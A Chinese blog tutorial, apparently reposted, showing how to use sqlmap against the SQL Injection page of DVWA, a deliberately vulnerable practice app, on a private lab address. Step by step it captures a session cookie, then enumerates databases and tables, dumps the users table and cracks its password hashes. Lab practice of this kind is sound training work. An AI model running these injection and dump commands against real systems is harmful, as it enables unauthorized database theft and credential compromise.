标签:
1 使用sqlmap注入DVWA的SQL Injection菜单
本教程中的登陆地址:http://192.168.0.112/dvwa/login.php
1) 使用admin/password登陆系统,通过firebug工具获取cookie信息。
得到的cookie信息如下:
security=low; path=/dvwa/; domain=192.168.0.112
PHPSESSID=0bec860709d15f590768b7713c69b52f; path=/; domain=192.168.0.112
2) 获取要测试的url
点击SQL Injection菜单,在User ID输入框内输入aa,点击submit按钮。通过firebug工具获取待测试的url如下: http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#
3) 使用sqlmap测试该url是否存在sql注入漏洞
执行如下命令: root@Kali-Linux:~# sqlmap -u ‘http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘ --cookie=‘security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f‘
4) 探测MYSQL中用来存放应用数据的数据库名称
执行如下命令:root@Kali-Linux:~# sqlmap -u ‘http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘ --cookie=‘security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f‘ --dbs -v 0
5) 查询出dvwa数据库中存在的表名
执行如下命令:root@Kali-Linux:~# root@Kali-Linux:~# sqlmap -u ‘http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘ --cookie=‘security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f‘ -D dvwa --tables
6) 得到users表中的字段列表
执行如下命令:root@Kali-Linux:~# sqlmap -u ‘http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘ --cookie=‘security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f‘ -D dvwa --tables -T users --columns
7) 导出users表
执行如下命令:root@Kali-Linux:~# sqlmap -u ‘http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘ --cookie=‘security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f‘ -D dvwa --tables -T users --columns --dump
一路y下来,竟然来数据库中的密文密码也给破译了。。
根据提示路径下载users.csv即可
使用sqlmap注入DVWA的SQL Injection菜单
标签:
原文地址:http://www.cnblogs.com/sindweller/p/4625698.html